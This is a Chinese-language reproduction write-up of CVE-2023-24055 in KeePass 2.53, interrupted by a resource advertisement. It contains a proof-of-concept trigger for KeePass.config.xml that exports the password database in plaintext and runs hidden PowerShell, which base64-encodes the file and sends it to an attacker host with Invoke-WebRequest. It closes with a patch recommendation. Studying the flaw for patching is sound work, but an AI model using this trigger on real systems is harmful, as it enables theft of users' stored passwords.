网站建设名头,wordpress 工作室,高质量的佛山网站模板,企业门户网站属于什么层一、漏洞描述
漏洞简述
KeePass 是一款免费的开源密码管理器#xff0c;可帮助您以安全的方式管理您的密码。您可以将所有密码存储在一个数据库中#xff0c;该数据库由一把万能钥匙锁定。因此#xff0c;您只需记住一个主密钥即可解锁整个数据库。数据库文件使用目前已知…一、漏洞描述
漏洞简述
KeePass 是一款免费的开源密码管理器可帮助您以安全的方式管理您的密码。您可以将所有密码存储在一个数据库中该数据库由一把万能钥匙锁定。因此您只需记住一个主密钥即可解锁整个数据库。数据库文件使用目前已知的最佳和最安全的加密算法AES-256、ChaCha20 和 Twofish进行加密。
对 KeePass 配置文件具有写入权限的攻击者可以修改它并注入恶意触发器例如通过添加导出触发器来获取明文密码。
漏洞影响范围
供应商KeePass
产品KeePass Password Safe 2
确认受影响版本KeePass 2.53版本
修复版本KeePass 2.53.1版本
二、漏洞复现实战
环境搭建
Step 1 KeePass 2.53 下载地址https://keepass.info/
Step 2 KeePass翻译语言包
下载地址https://keepass.info/translations.html
将语言包文件复制至安装路径下“Languages”文件夹下 在KeePass中进入语言设置切换语言 漏洞复现
根据原理,在安装路径下的配置文件KeePass.config.xml根据触发器功能的安全缺陷进行利用。
帮助网安学习全套资料S信免费领取 ① 网安学习成长路径思维导图 ② 60网安经典常用工具包 ③ 100SRC分析报告 ④ 150网安攻防实战技术电子书 ⑤ 最权威CISSP 认证考试指南题库 ⑥ 超1800页CTF实战技巧手册 ⑦ 最新网安大厂面试题合集含答案 ⑧ APP客户端安全检测指南安卓IOS
创建一个触发器在密码数据库存在交互时进行明文传输。触发器创建主要细分为两种方式
1POC写入配置文件
将编写好的POC代码写入KeePass.config.xml须符合触发器XML格式。
其中Parameterc:\Users\???\AppData\Local\Temp\exploit.xml/Parameter字段为明文传输路径。
利用powershell以GET方式传输数据库中密码文件。
POC TriggerSystem TriggersTriggerGuidlztpSRd56EuYtwwqntH7TQ/GuidNameexploit/NameEventsEventTypeGuids6j9/ngTSmqcXdW6hDqbjg/TypeGuidParametersParameter0/ParameterParameter //Parameters/Event/EventsConditions /ActionsActionTypeGuidD5prW87VRr65NO2xP5RIIg/TypeGuidParametersParameterc:\Users\???\AppData\Local\Temp\exploit.xml/ParameterParameterKeePass XML (2.x)/ParameterParameter /Parameter //Parameters/ActionActionTypeGuid2uX4OwcwTBOe7y66y27kxw/TypeGuidParametersParameterPowerShell.exe/ParameterParameter-ex bypass -noprofile -c $var([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes(c:\Users\???\AppData\Local\Temp\exploit.xml)));Invoke-WebRequest -uri http://192.168.XXX.XXX:8888/$var -Method GET /ParameterParameterFalse/ParameterParameter1/ParameterParameter //Parameters/Action/Actions/Trigger/Triggers /TriggerSystem保存KeePass.config.xml文件触发器功能查看exploit触发器
2通过触发器功能手工创建触发器
以官方触发器构成为参考
https://keepass.info/help/kb/trigger_examples.html
exploit触发器配置如下
属性项命名为exploit其余默认配置 事件项选择Saved database file已保存数据库文件判断条件选Equals相等 条件项为空 操作项
导出当前数据库
文件路径为上述文件传输路径
文件格式选择 KeePass XML (2.x)
执行命令行/URL
文件路径为PowerShell.exe 使触发器执行PowerShell
参数选择攻击接收的路径
窗口方式选择Hidden 完成创建可以看到exploit触发器
在攻击机 创建web服务后续接收传输后的密码明文
在KeePass中新建一条密码记录并保存可以看到攻击机终端已接收到明文信息 进行base64解码可以看到内容为密码记录内容包含账号与密码等敏感信息。 漏洞修复
建议更新至KeePass 2.53.1 版本
结束语
本文主要介绍了CVE-2023-24055 KeePass敏感信息明文传输漏洞的复现过程漏洞主要利用对 KeePass 配置文件在写入权限下可以修改它并注入恶意触发器例如通过添加导出触发器来获取明文密码。